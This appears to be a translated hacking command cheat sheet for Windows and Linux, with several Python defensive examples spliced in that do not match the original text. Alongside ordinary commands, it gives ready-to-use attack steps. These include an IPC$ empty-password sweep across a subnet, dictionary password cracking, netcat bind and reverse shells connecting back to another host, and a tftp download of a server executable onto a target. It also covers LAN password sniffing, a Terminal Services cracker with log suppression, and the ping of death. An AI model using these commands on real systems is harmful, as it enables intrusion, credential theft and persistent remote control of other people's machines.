net use \\ip\ipc$ "" /user:""    establishes an IPC$ null session
net use \\ip\ipc$ "password" /user:"username"    establishes an authenticated (non-null) IPC$ connection
net use h: \\ip\c$ "password" /user:"username"    logs in directly and maps the remote host's C: drive to the local H:
net use H: \\ip\c$    after logging in, maps the remote host's C: drive to the local H:
net use \\ip\ipc$ /del    deletes the IPC$ connection
net use H: /del    removes the mapping of the remote drive to the local H:
net user username password /add    creates a user
net user Guest /active:yes    activates the Guest account
net user    lists the user accounts
net user accountname    shows the properties of an account
net localgroup Administrators username /add    adds "username" to the Administrators group so that it has administrator privileges. Note: Administrators takes the plural "s".
net start    lists the services that are running
net start servicename    starts a service (for example: net start Telnet, net start schedule)
net stop servicename    stops a service
net time \\targetIP    shows the remote host's time
net time \\targetIP /set    sets the local computer's time to match the target host; add the /yes parameter to skip the confirmation prompt
net view    lists the shares open in the local LAN
net view \\ip    lists the shares open on the remote host
net config    displays the system's network settings
net logoff    disconnects shares
net pause servicename    pauses a service
net send IP "text"    sends a message to the remote host
net ver    shows the network connection types and information in use within the LAN
net share    lists the shares opened locally
net share ipc$    opens the ipc$ share
net share ipc$ /del    deletes the ipc$ share
net share c$ /del    deletes the C: share
net user Guest 12345    after logging in, sets the Guest account's password to 12345
net password password    changes the system login password
netstat -a    lists the open ports; netstat -an is the commonly used form
netstat -n    shows the network connections by port number; netstat -an is the commonly used form
netstat -v    shows the work in progress
netstat -p protocolname    shows the usage of one protocol; for example, netstat -p tcp/ip shows TCP/IP protocol usage
netstat -s    shows usage statistics for all protocols in use
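The netstat listings above are easier to review when parsed than when read by eye. The following Python example is added here and is not from the original page: it parses the text of a Windows netstat -an listing, lists the TCP ports in LISTENING state, compares them with a baseline of expected ports and counts established connections per remote host. The netstat sample embedded in it is constructed for the demo, and the baseline port set is an assumption.

```python
# Added example (not from the original page): parse a Windows "netstat -an"
# listing and review it the way an analyst would: which TCP ports are
# listening, which of them are not in the expected baseline, and which
# remote hosts hold established connections. SAMPLE_NETSTAT_AN is constructed.
import re
from collections import Counter

SAMPLE_NETSTAT_AN = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5354           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:445       192.168.1.77:49211     ESTABLISHED
  TCP    192.168.1.10:3389      192.168.1.77:49300     ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

# One netstat row: protocol, local address:port, foreign address, optional state.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s*(\S+)?\s*$")


def parse_netstat(text):
    """Return a list of dicts, one per connection row; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, faddr, state = m.groups()
        rows.append({
            "proto": proto,
            "local_addr": laddr,
            "local_port": int(lport),
            "foreign": faddr,
            "state": state or "",
        })
    return rows


def listening_ports(rows, proto="TCP"):
    """Sorted local ports in LISTENING state for the given protocol."""
    return sorted({r["local_port"] for r in rows
                   if r["proto"] == proto and r["state"] == "LISTENING"})


def unexpected_listeners(rows, baseline):
    """Listening ports that are not in the expected baseline set (assumed)."""
    return [p for p in listening_ports(rows) if p not in baseline]


def remote_peers(rows):
    """Count established connections per remote host address."""
    peers = Counter()
    for r in rows:
        if r["state"] == "ESTABLISHED":
            peers[r["foreign"].rsplit(":", 1)[0]] += 1
    return peers


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT_AN)
    print("listening:", listening_ports(rows))
    print("not in baseline:", unexpected_listeners(rows, {135, 445, 3389}))
    print("peers:", dict(remote_peers(rows)))
```

Feed it the saved output of netstat -an and keep the baseline set per host role; a listener that is not in the baseline (port 5354 in the constructed sample) is the line to investigate first.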
nbtstat -A IP    if one of the remote host's ports 136 to 139 is open, shows the most recently logged-in username (the name before <03>). Note: the -A parameter must be uppercase.
tracert -parameter IP (or hostname)    traces the route taken by packets; the parameter "-w number" sets the timeout interval
ping IP (or domain name)    sends packets of the default size of 32 bytes to the remote host. Parameters: "-l [space] size" sets the packet size; "-n count" sets the number of packets sent; "-t" pings continuously
ping -t -l 65550 IP    "ping of death" (sending packets larger than 64K and pinging continuously)
ipconfig (winipcfg)    on Windows NT and XP (Windows 95/98) shows the local IP address
ipconfig /all    the /all parameter shows all configuration information
tlist -t    displays the processes as a tree (a system support tool, not installed by default; found in the Support\Tools folder of the installation media)
kill -f processname    with the -f parameter, forcibly ends a process (a system support tool, not installed by default; found in the Support\Tools folder of the installation media)
del /f filename    the /f parameter deletes read-only files; /ar, /ah, /as and /aa delete read-only, hidden, system and archive files respectively; /a-r, /a-h, /a-s and /a-a delete the files other than read-only, hidden, system and archive files. For example, "del /ar *.*" deletes all read-only files in the current directory, and "del /a-s *.*" deletes all files in the current directory except the system files.
del /s /q directory, or rmdir /s /q directory    /s deletes the directory together with all of its subdirectories and files; /q suppresses the system's confirmation prompt for the delete operation. (The two commands have the same effect.)
move drive:\path\filename destpath\filename    moves a file; the /y parameter suppresses the confirmation prompt when a file of the same name exists in the destination directory
fc one.txt two.txt > 3st.txt    compares the two files and writes the differences to the file 3st.txt; ">" and ">>" are redirection operators
at ID    opens a registered scheduled task by its ID number
at /delete    stops all scheduled tasks; with the /yes parameter, stops them directly without confirmation
at ID /delete    stops one registered scheduled task
at    lists all scheduled tasks
at \\IP time programname (or a command) /r    runs the program on the remote host at the given time and restarts the computer
finger username@host    shows which users have logged in recently
telnet IP port    logs in to a remote server; the default port is 23
open IP    connects to IP (a command used after entering telnet)
telnet    typed with no arguments on this computer enters the local telnet client
copy path\filename1 path\filename2 /y    copies file 1 to the given directory as file 2; the /y parameter also suppresses the confirmation prompt when overwriting an existing file in the directory
copy c:\srv.exe \\ip\admin$    copies the local c:\srv.exe to the remote host's admin$ share
copy 1st.jpg /b + 2st.txt /a 3st.jpg    hides the content of 2st.txt inside 1st.jpg, producing the new file 3st.jpg. Note: leave three empty lines at the top of 2st.txt. Parameters: /b means a binary file, /a means an ASCII-format file.
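A file produced with copy /b + /a as described above still opens as a normal image, because the appended text sits after the JPEG End-Of-Image marker. The Python example below is added here and is not from the original page: it detects such a file by checking for bytes after the last FFD9 marker and reports whether they look like text. The image bytes and the appended message are constructed for the demo.

```python
# Added example (not from the original page): flag a JPEG that carries data
# appended after its End-Of-Image marker, which is what
# "copy 1st.jpg /b + 2st.txt /a 3st.jpg" produces. The image bytes and the
# appended message below are constructed for the demo, not a real photo.
SOI = b"\xff\xd8"   # Start Of Image
EOI = b"\xff\xd9"   # End Of Image

# Constructed: three blank lines, a message, then the Ctrl-Z (0x1A) that copy /a
# writes at the end of ASCII data.
APPENDED = b"\r\n\r\n\r\nsecret message hidden after the image\r\n\x1a"


def build_sample():
    """A minimal JPEG-shaped blob (SOI, one APP0 segment, EOI) plus APPENDED."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 9   # segment length 0x10
    return SOI + app0 + EOI + APPENDED


def trailing_data(blob):
    """Bytes after the last EOI marker, or None if blob is not JPEG-shaped."""
    if not blob.startswith(SOI):
        return None
    idx = blob.rfind(EOI)
    if idx == -1:
        return None
    return blob[idx + len(EOI):]


def looks_like_text(data):
    """True if every byte is printable ASCII or a whitespace/Ctrl-Z byte."""
    return bool(data) and all(b in b"\r\n\t\x1a" or 32 <= b < 127 for b in data)


def scan(blob):
    """Summary an analyst can act on: JPEG or not, trailing byte count, text?"""
    tail = trailing_data(blob)
    if tail is None:
        return {"jpeg": False, "trailing_bytes": 0, "text": False}
    return {"jpeg": True, "trailing_bytes": len(tail), "text": looks_like_text(tail)}


if __name__ == "__main__":
    print(scan(build_sample()))
```

Some cameras and editors legitimately leave a few trailing bytes, so a non-zero count is a lead to inspect rather than proof of hidden content; printable text after the marker is the stronger signal. Using the last EOI rather than the first keeps embedded thumbnails (which carry their own EOI) from triggering a false report.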
copy \\ip\admin$\srv.exe c:\    or: copy \\ip\admin$\*.* c:\    copies srv.exe (or all files) from the remote host's admin$ share to the local C:
xcopy source destination\dirname    copies files and directory trees; with the /y parameter there is no prompt before overwriting files of the same name
tftp -i ownIP get server.exe c:\server.exe    (when using a compromised host as a springboard, use that host's IP) after logging in, downloads server.exe from "IP" to the target host as c:\server.exe. Parameters: -i means binary-mode transfer, used for example for EXE files; without -i the transfer is in ASCII mode (the mode for text files)
tftp -i remoteIP put c:\server.exe    after logging in, uploads the local c:\server.exe to the host
ftp IP port    used to upload files to a server or perform file operations; the default port is 21. bin selects binary transfer (for executable files); the default is ASCII-format transfer (for text files)
route print    shows the IP routing table, mainly the Network Address, the Netmask, the Gateway Address and the Interface address
arp    views and manipulates the ARP cache. ARP stands for address resolution and is responsible for resolving an IP address into a physical MAC address. arp -a shows all entries.
start programname or command /max or /min    opens a new maximized (or minimized) window running the given program or command
mem    shows CPU usage
attrib filename (dirname)    shows the attributes of a file (directory)
attrib filename -a -r -s -h, or +a +r +s +h    removes (adds) the archive, read-only, system and hidden attributes of a file; + adds an attribute
dir    lists files. Parameters: /q shows which user each file and directory belongs to; /t:c shows the file creation time; /t:a shows the last access time; /t:w shows the last modification time
date /t, time /t    with this parameter, "date /t" and "time /t" display only the current date and time without prompting for a new date and time
set variablename=string    assigns the string to the variable, setting an environment variable
set    shows all current environment variables
set p (or another character)    shows all current environment variables whose names begin with p (or the other character)
pause    suspends the batch program and displays: Press any key to continue ...
if    performs conditional processing in a batch program (see "if command and variables" below for details)
goto label    directs cmd.exe to a labeled line in the batch program (the label must be on its own line and begin with a colon, for example the label ":start")
call path\batchfile    calls another batch program from within a batch program (see call /? for details)
for    executes a given command for each file in a set of files (see "for command and variables" below for details)
echo on or off    turns echo on or off; echo with no arguments displays the current echo setting
echo message    displays the message on the screen
echo message >> pass.txt    appends "message" to the file pass.txt
findstr "Hello" aa.txt    finds the string Hello in the file aa.txt
find filename    looks for a file
title name    changes the title of the cmd window
color value    sets the foreground and background colors of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = aqua, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = blue, a = light green, b = pale green, c = pink, d = pale violet, e = yellowish, f = bright white
prompt name    changes the command prompt displayed by cmd.exe (for example, changes c:\, d:\ uniformly to entsky\)
print filename    prints a text file
ver    displays version information in the DOS window
winver    pops up a window displaying version information (memory size, system version, patch version, computer name)
format drive: /fs:type    formats a disk; type is FAT, FAT32 or NTFS. Example: format d: /fs:ntfs
md dirname    creates a directory
replace sourcefile targetdir    replaces a file in the target directory
ren oldname newname    renames a file
tree    displays the directory structure as a tree; with the /f parameter it also lists the file names in each folder
type filename    displays the contents of a text file
more filename    displays a file's output one screen at a time
doskey command=string    locks the command
doskey command=    unlocks the command. doskey is the locking facility provided for DOS (editing the command line, recalling Win2K commands and creating macros). For example, lock the dir command: doskey dir=entsky (doskey dir=dir cannot be used); unlock it: doskey dir=
taskmgr    launches the Task Manager
chkdsk /f d:    checks disk D: and displays a status report; the /f parameter repairs errors on the disk
tlntadmn    telnet service administration: type tlntadmn, choose option 3, then option 8 to change the Telnet service's default port 23 to any other port
exit    exits cmd.exe or the current batch script; with the /b parameter it exits the current batch script instead of cmd.exe
path path\executable    sets a search path for executable files
cmd    starts a Win2K command interpreter window. Parameters: /e:off and /e:on disable and enable command extensions; see cmd /? for the detailed description
regedit /s registryfile    imports a registry file; the /s parameter means quiet-mode import, without any prompt
regedit /e registryfile    exports the registry
cacls filename parameters    shows or modifies a file's access control list (ACL); for NTFS only. Parameters: /d username denies the user access; /p username:perm replaces the specified user's access rights; /g username:perm grants the specified user access rights. perm can be: N none, R read, W write, C change (write), F full control. Example: cacls d:\test.txt /d pub denies the user pub access to d:\test.txt.
cacls filename    views the list of users' access rights for a file
rem text    adds a comment to a batch file
netsh    views or changes the local network configuration
IIS service commands:
iisreset /reboot    reboots the Win2K computer (the system will prompt that it is about to restart)
iisreset /start or /stop    starts (stops) all Internet services
iisreset /restart    stops and then restarts all Internet services
iisreset /status    shows the status of all Internet services
iisreset /enable or /disable    enables (disables) the restarting of Internet services on the local system
iisreset /rebootonerror    reboots the computer if an error occurs while Internet services are starting, stopping or restarting
iisreset /noforce    if Internet services cannot be stopped, they will not be forcibly terminated
iisreset /timeout val    the number of seconds to wait for Internet services to stop; if they still have not stopped and the /rebootonerror parameter was specified, the computer reboots. The defaults are 20 seconds for restart, 60 seconds for stop and 0 seconds for reboot.
FTP commands: (detailed description later)
The command-line format of ftp is:
ftp -v -d -i -n -g [hostname]
-v shows all response information from the remote server
-d uses debug mode
-n disables ftp's automatic login, that is, the .netrc file is not used
-g disables filename globbing
help [command] or ? [command]    shows the description of a command
bye or quit    terminates the ftp process with the host and exits ftp
pwd    shows the current directory on the remote host
put or send localfile [remotefile]    transfers a local file to the remote host
get or recv [remotefile] [localfile]    downloads a file from the remote host to the local host
mget [remote-files]    receives a batch of files from the remote host on the local host
mput local-files    sends a batch of files from the local host to the remote host
dir or ls [remote-directory] [local-file]    lists the files in the current remote directory; if a local file is given, the listing is written to that file
ascii    sets the transfer mode to ASCII (the default)
bin or image    sets the transfer mode to binary
bell    sounds an alert each time a file transfer completes
cdup    returns to the parent directory
close    ends the ftp session with the remote server (the counterpart of open)
open host [port]    establishes a connection to the specified ftp server, optionally on the given port
delete    deletes a file on the remote host
mdelete [remote-files]    deletes a batch of files
mkdir directory-name    creates a directory on the remote host
rename [from] [to]    renames a file on the remote host
rmdir directory-name    deletes a directory on the remote host
status    shows the current ftp status
system    shows the remote host's system type
user user-name [password] [account]    logs in to the remote host again with another user name
open host [port]    establishes a new connection
prompt    toggles interactive prompting mode
macdef    defines a macro command
lcd    changes the current working directory on the local host; with no argument, goes to the current user's home directory
chmod    changes file permissions on the remote host
case    when on, file names copied to the local machine with mget have all letters converted to lowercase
cd remote-dir    enters a directory on the remote host
cdup    enters the parent of the current remote directory
!    runs an interactive shell on the local machine; exit returns to the ftp environment. For example: !ls *.zip
MySQL commands:
mysql -h hostaddress -u username -p password    connects to MySQL; on a freshly installed MySQL the superuser root has no password.
(Example: mysql -h110.110.110.110 -uroot -p123456
Note: -u and root can be written without a space between them; the same applies to the other options.)
exit    leaves MySQL
mysqladmin -u username -p oldpassword password newpassword    changes a password
grant select on database.* to username@loginhost identified by "password";    adds a new user. (Note: unlike the commands above, the following are commands typed inside the MySQL environment, so they end with a semicolon as the command terminator.)
show databases;    lists the databases. Initially there are only two: mysql and test. The mysql database is very important: it holds MySQL's system information, and changing passwords or adding users actually operates on this database.
use mysql;
show tables;    lists the tables in a database
describe tablename;    shows the structure of a table
create database dbname;    creates a database
use dbname;
create table tablename (field list);
drop database dbname;
drop table tablename;    deletes a table
delete from tablename;    empties the records in a table
select * from tablename;    shows the records in a table
mysqldump --opt school > school.bbb    backs up a database (run from the DOS prompt in the \mysql\bin directory). Note: this backs up the database school to the file school.bbb; school.bbb is a text file, so open it and see what you find.
New commands under the Win2003 system (practical part):
shutdown /parameter    shuts down or restarts a local or remote host.
Parameter description: /s shuts down the host; /r reboots the host; /t number sets a delay between 0 and 180 seconds; /a cancels the shutdown; /m \\IP specifies the remote host.
Example: shutdown /r /t 0 reboots the local host immediately (no delay)
taskkill /parameter processname or process PID    terminates one or more tasks and processes.
Parameter description: /pid terminates the process with the given PID (the tasklist command can be used to obtain a process's PID); /im terminates the process with the given process name; /f forcibly terminates the process; /t terminates the specified process together with the child processes it started.
tasklist    displays the processes, services and process identifiers (PIDs) currently running on the local or remote host.
Parameter description: /m lists the DLL files loaded by the current processes; /svc shows the services corresponding to each process; with no parameters only the current processes are listed.
Basic commands for Linux systems (note: they are case-sensitive):
uname    displays version information (like ver on Win2K)
dir    lists the files in the current directory; ls -al also shows hidden files (like dir on Win2K)
pwd    shows the current directory location
cd ..    goes back to the parent directory; note that there is a space between cd and ..; cd / goes back to the root directory
cat filename    views the contents of a file
cat > abc.txt    writes the typed input into the file abc.txt
more filename    displays a text file one page at a time
cp    copies files
mv    moves files
rm filename    deletes a file; rm -r dirname deletes a directory and its subdirectories
mkdir dirname    creates a directory
rmdir    deletes a subdirectory; the directory must contain no files
chmod    sets the access permissions of files or directories
grep    finds a string in a file
diff    compares files
find    searches for files
date    shows the current date and time
who    shows who is currently using the same machine as you, with their login time and location
w    shows the details of the people currently on the machine
whoami    shows your account name
groups    shows the groups a user belongs to
passwd    changes the password
history    shows the commands you have entered
ps    displays process status
kill    stops a process
gcc    hackers usually use it to compile files written in the C language
su    switches to the specified user
telnet IP    connects to a remote host via telnet (as on Win2K); a bash$ prompt shows that the connection succeeded
ftp    makes an ftp connection to a server (as on Win2K)
Appendix: batch commands and variables
1: for command and variables. Basic format:
for /parameter %variable in (set) do command [command_parameters]
%variable: specifies a single-letter replaceable parameter, such as %i; inside a batch file the variable is written %%i, and it is referenced as %i%. Variable names are case-sensitive (%i is not the same as %I).
A batch file can handle ten variables, %0 to %9, where %0 defaults to the batch file's name and %1 defaults to the first value entered when running the batch; similarly %2 to %9 refer to the 2nd to 9th values entered. For example, in net use \\ip\ipc$ pass /user:user, ip is %1, pass is %2 and user is %3.
(set): specifies a file or set of files; wildcards can be used, for example (d:\user.txt), (1 1 254) or (1 -1 254). In "(1 1 254)" the first "1" is the starting value, the second "1" is the increment and "254" is the end value, that is, from 1 to 254; "(1 -1 254)" means from 254 to 1.
command: specifies the command to execute for each file, such as the net use command; when several commands are executed, separate them with &.
command_parameters: specifies parameters or command-line switches for the given command.
in (set): means take a value from (set); do command: the command to run.
Parameters: /l means the incremental form {(set) is a range}; /f means take values from a file until the file is exhausted {(set) is a file, such as (d:\pass.txt)}.
Usage examples:
@echo off
echo Usage: test.bat *.*.* > test.txt
for /l %%g in (1 1 254) do echo %1.%%g >> test.txt & net use \\%1.%%g /user:administrator | find "command completed successfully" >> test.txt
Save as test.bat. Description: for the 254 IPs of the specified class C segment, tries to establish an ipc$ connection as administrator with an empty password; if it succeeds, the IP is recorded in test.txt.
/l means the incremental form (that is, from 1 to 254 or from 254 to 1); the first three octets of the IP, typed as *.*.*, are the batch's %1 by default; %%g is the variable (the last octet of the IP); & separates the two commands echo and net use; | pipes the result of establishing the ipc$ connection into find, which checks whether the output contains "command completed successfully"; %1.%%g is the complete IP address; (1 1 254) gives the starting value, the increment and the end value.
@echo off
echo Usage: ok.bat IP
for /f %%i in (d:\user.dic) do smb.exe %1 %%i d:\pass.dic 200
Save as ok.bat. Description: given an IP, uses the dictionary file d:\pass.dic to crack each user listed in d:\user.dic until the values in the file are exhausted. %%i is the user name; %1 is the IP entered (the default).
2: if command and variables. Basic format:
if [not] errorlevel number command    if the program run last returned an exit code equal to or greater than the specified number, the condition is true.
Example: if errorlevel 0 command means that when the value returned by the program's execution is 0, the command that follows on the line runs; if not errorlevel 1 command means that when the value last returned by the program's execution is not equal to 1, the following command runs.
0 means found and executed successfully (true); 1 means not found, not executed (false).
if [not] string1==string2 command    if the specified text strings match (that is, string1 equals string2), the following command runs.
Example: "if "%2%"=="4" goto start" means: if the second variable entered is 4, the following command runs (note: when referencing a variable, put %variablename% inside "").
if [not] exist filename command    if the specified file exists, the following command runs.
Example: "if not exist nc.exe goto end" means: if the file nc.exe is not found, jump to the place marked by the ":end" label.
if [not] errorlevel number command else command, or if [not] string1==string2 command else command, or if [not] exist filename command else command    the added else command means: when the preceding condition does not hold, run the command after else. Note: else must be on the same line as if to be valid. When the command is del, the whole del command must be enclosed in < >, because del has to run on its own line, and < > stands in for a separate line. For example: "if exist test.txt. else echo test.txt. missing"; note the "." in the command.
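The for /l ranges in section 1 and the errorlevel tests in section 2 are easy to get subtly wrong, so here is an added Python emulator of their semantics (not from the original page): it reproduces the (start step end) counting of for /l, the token splitting of for /f "tokens=N delims=..." over a file's lines, and the comparison that if [not] errorlevel N actually performs. Two facts worth seeing in the output: cmd compares errorlevel with "greater than or equal", so if errorlevel 0 is always true and if not errorlevel 1 is the test for success; and a range whose step points away from the end value, such as (1 -1 254), produces no iterations at all, the descending form being (254 -1 1). The input lines are constructed.

```python
# Added example (not from the original page): a small emulator that makes the
# exact semantics of three batch constructs from the appendix visible:
#   for /l %%i in (start step end)
#   for /f "tokens=N delims=..." %%i in (file)
#   if [not] errorlevel N
# The input lines used in the demo are constructed.


def for_l(start, step, end):
    """Values produced by `for /l %%i in (start step end)`: count from start by
    step while the value has not passed end. A step whose sign points away from
    end yields nothing, so the descending form of 1..254 is (254 -1 1)."""
    values = []
    if step == 0:
        return values          # cmd would loop forever; refuse instead
    i = start
    while (i <= end) if step > 0 else (i >= end):
        values.append(i)
        i += step
    return values


def for_f_tokens(lines, token=1, delims=" \t", eol=";"):
    """Token N of each line, as `for /f "tokens=N delims=..."` would yield it.
    Empty lines and lines beginning with the eol character are skipped, and
    runs of delimiters count as one separator."""
    out = []
    for line in lines:
        line = line.rstrip("\r\n")
        if not line or (eol and line.startswith(eol)):
            continue
        parts, cur = [], ""
        for ch in line:
            if ch in delims:
                if cur:
                    parts.append(cur)
                    cur = ""
            else:
                cur += ch
        if cur:
            parts.append(cur)
        if len(parts) >= token:
            out.append(parts[token - 1])
    return out


def if_errorlevel(exit_code, n, negate=False):
    """`if errorlevel N` is true when the last exit code is >= N, so
    `if errorlevel 0` is always true and `if not errorlevel 1` tests success."""
    result = exit_code >= n
    return not result if negate else result


if __name__ == "__main__":
    print(for_l(1, 1, 5), for_l(254, -1, 250), for_l(1, -1, 254))
    print(for_f_tokens(["10.0.0.1 host1", "; comment", "", "10.0.0.2\thost2"]))
    print(if_errorlevel(2, 0), if_errorlevel(0, 1, negate=True))
```

The practical consequence for the batch files in this appendix: a script that checks a tool's result with if errorlevel 0 will take the "success" branch no matter what happened, and a list file with a stray leading ";" line silently loses that entry.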
(b) External system commands (all require downloading the relevant tools):
1. The Swiss Army knife: nc.exe
Parameter description:
-h    shows help information
-d    background (detached) mode
-e prog    redirects the program once a connection is made [dangerous]
-i secs    delay interval
-l    listening mode, for inbound connections
-L    listening mode; after a connection closes, keeps listening until Ctrl+C
-n    numeric IP addresses only; domain names cannot be used
-o file    records the traffic in hexadecimal to a file
-p [space] port    local port number
-r    random local and remote ports
-t    uses telnet negotiation mode
-u    UDP mode
-v    verbose output; -vv is more detailed
-w number    timeout delay interval
-z    turns input and output off (used for port scanning)
Basic usage:
nc -nvv 192.168.0.1 80    connects to port 80 of the host 192.168.0.1
nc -l -p 80    opens local TCP port 80 and listens
nc -nvv -w2 -z 192.168.0.1 80-1024    scans ports 80 to 1024 of 192.168.0.1
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe    binds the remote host's cmd shell to its TCP port 5354
nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354    binds the remote host's cmd shell and connects it back to port 5354 of 192.168.0.2
Advanced usage:
nc -l -p 80    as honeypot usage 1: opens port 80 and keeps listening until Ctrl+C
nc -l -p 80 > c:\log.txt    as honeypot usage 2: opens port 80 and keeps listening until Ctrl+C, writing what it receives to c:\log.txt
nc -l -p 80 < c:\honeyport.txt    as honeypot usage 3-1: opens port 80 and keeps listening until Ctrl+C, feeding the contents of c:\honeyport.txt into the connection; this can also serve to transfer a file
type.exe c:\honeyport.txt | nc -l -p 80    as honeypot usage 3-2: opens port 80 and keeps listening until Ctrl+C, feeding the contents of c:\honeyport.txt into the connection; this can also serve to transfer a file
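The nc honeypot above records only the raw bytes, and nothing about who sent them or when. The Python listener below is an added example (not from the original page or the nc project) of the same idea with that bookkeeping done: it accepts connections, logs the peer address, a timestamp and the first bytes received, and never answers. The port choice (0, meaning a free port) and the in-memory record list are assumptions for the demo; a deployment would bind the port it wants to watch and append each formatted record to a file.

```python
# Added example (not from the original page): a logging TCP listener in the
# spirit of the "nc -l -p 80 > c:\log.txt" honeypot above. It accepts
# connections, records the peer address, a timestamp and the first bytes
# received, and never answers. Port 0 (pick a free port) is an assumption
# for the demo; a deployment would bind the port it wants to watch.
import socket
import threading
import time


class LoggingListener:
    def __init__(self, host="127.0.0.1", port=0, capture=256):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.sock.settimeout(0.2)           # lets the accept loop notice stop()
        self.port = self.sock.getsockname()[1]
        self.capture = capture
        self.records = []                   # in a deployment, append to a file
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(1.0)
                try:
                    data = conn.recv(self.capture)   # first bytes only
                except (socket.timeout, OSError):
                    data = b""
            self.records.append({
                "time": time.time(),
                "peer_ip": peer[0],
                "peer_port": peer[1],
                "first_bytes": data,
            })

    def wait_for(self, count, timeout=3.0):
        """Block until at least `count` records exist or the timeout passes."""
        deadline = time.time() + timeout
        while len(self.records) < count and time.time() < deadline:
            time.sleep(0.05)
        return len(self.records) >= count

    def stop(self):
        self._stop.set()
        self._thread.join()
        self.sock.close()


def format_record(r):
    """One log line per connection attempt, UTC timestamp first."""
    stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(r["time"]))
    return "%s %s:%d %r" % (stamp, r["peer_ip"], r["peer_port"], r["first_bytes"])


def probe(port, payload):
    """Demo client: connect to the listener and send a constructed payload."""
    with socket.create_connection(("127.0.0.1", port), timeout=2) as c:
        c.sendall(payload)


if __name__ == "__main__":
    listener = LoggingListener().start()
    probe(listener.port, b"GET / HTTP/1.0\r\n\r\n")
    listener.wait_for(1)
    listener.stop()
    for rec in listener.records:
        print(format_record(rec))
```

Capturing only the first few hundred bytes keeps the log small and avoids holding connections open; the peer address and timestamp are what make the record useful later, when the same source shows up in the netstat or audit data elsewhere on this page.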
On the local machine: nc -l -p localport
On the remote host: nc -e cmd.exe localIP -p localport (Win2K), or nc -e /bin/sh localIP -p localport (Linux, Unix)    reverse connection, getting through the remote host's firewall
On the local machine: nc -d -l -p port < path and name of the file to transfer
On the remote host: nc -vv localIP localport > path and name to save the file    transfers the file to the remote host
Notes
|    pipe operator
< or >    redirection operators. "<", for example: tlntadmn < test.txt feeds the contents of test.txt to the tlntadmn command as its input
@    executes the command after @ without displaying it (background execution). Example: @dir c:\winnt >> d:\log.txt means: run dir in the background and put the result in d:\log.txt
The difference between > and >>: ">" means overwrite; ">>" means save to (append to). For example, run @dir c:\winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt twice each and compare: with >> both results are kept, but with > only one is, because the second result overwrites the first.
2. Port scanning tool: xscan.exe
Basic format
xscan -host <start IP>[-<end IP>] <test items> [other options]    scans all host information in the segment from the start IP to the end IP
xscan -file <host list filename> <test items> [other options]    scans all host information for the hosts in the host IP list file
Test items
-active    checks whether the host is alive
-os    detects the remote operating system type (via the NetBIOS and SNMP protocols)
-port    detects the port status of common services
-ftp    detects FTP weak passwords
-pub    detects anonymous user write permission on the FTP service
-pop3    detects POP3 server weak passwords
-smtp    detects SMTP server vulnerabilities
-sql    detects SQL Server weak passwords
-smb    detects NT server weak passwords
-iis    detects IIS encoding/decoding vulnerabilities
-cgi    detects CGI vulnerabilities
-nasl    loads Nessus attack scripts
-all    detects all of the above items
Other options
-i adapter number    sets the network adapter; the <adapter number> can be obtained with the -l parameter
-l    displays all network adapters
-v    displays detailed scan progress
-p    skips hosts that do not respond
-o    skips hosts on which no open port is detected
-t concurrent threads, concurrent hosts    specifies the maximum number of concurrent threads and the number of concurrent hosts; the defaults are 100 and 10
-log filename    specifies the scan report file name (suffix: txt or html format file)
Usage examples
xscan -host 192.168.1.1-192.168.255.255 -all -active -p    detects all vulnerabilities within the 192.168.1.1-192.168.255.255 segment, skipping hosts that do not respond
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o    detects the standard port status and NT weak-password users of the hosts in the 192.168.1.1-192.168.255.255 segment, with a maximum of 150 concurrent threads, skipping hosts on which no open port is detected
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o    detects the standard port status and CGI vulnerabilities of all hosts listed in the file "hostlist.txt", with a maximum of 200 concurrent threads and at most 5 hosts detected at a time, showing detailed detection progress and skipping hosts on which no open port is detected
3. Command-line sniffer: xsniff.exe
Can capture FTP/SMTP/POP3/HTTP protocol passwords on the LAN
Parameter description
-tcp    outputs TCP datagrams
-udp    outputs UDP datagrams
-icmp    outputs ICMP datagrams
-pass    filters for password information
-hide    runs in the background
-host    resolves host names
-addr IP address    filters by IP address
-port port    filters by port
-log filename    saves the output to a file
-asc    outputs in ASCII form
-hex    outputs in hexadecimal form
Usage examples
xsniff.exe -pass -hide -log pass.log    runs the sniffer in the background, sniffing passwords and saving the password information in the file pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1    sniffs 192.168.1.1, filtering TCP and UDP information and outputting it in ASCII format
4. Terminal Services password cracker: tscrack.exe
Parameter description
-h    displays usage help
-v    displays version information
-s    displays the cracking capability on screen
-b    beeps when a bad password is tried
-t    makes multiple connections (multithreading)
-N    prevents system log entries on the targeted server
-u    uninstalls the tscrack components
-f    uses the password following -f
-F    time interval (frequency)
-l    uses the user name following -l
-w    uses the password dictionary following -w
-p    uses the password following -p
-d    login home page
Usage examples
tscrack 192.168.0.1 -l administrator -w pass.dic    cracks the remote host's administrator login password using the password dictionary file
tscrack 192.168.0.1 -l administrator -p 123456    logs in to 192.168.0.1 remotely as administrator with the password 123456
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
:noscan
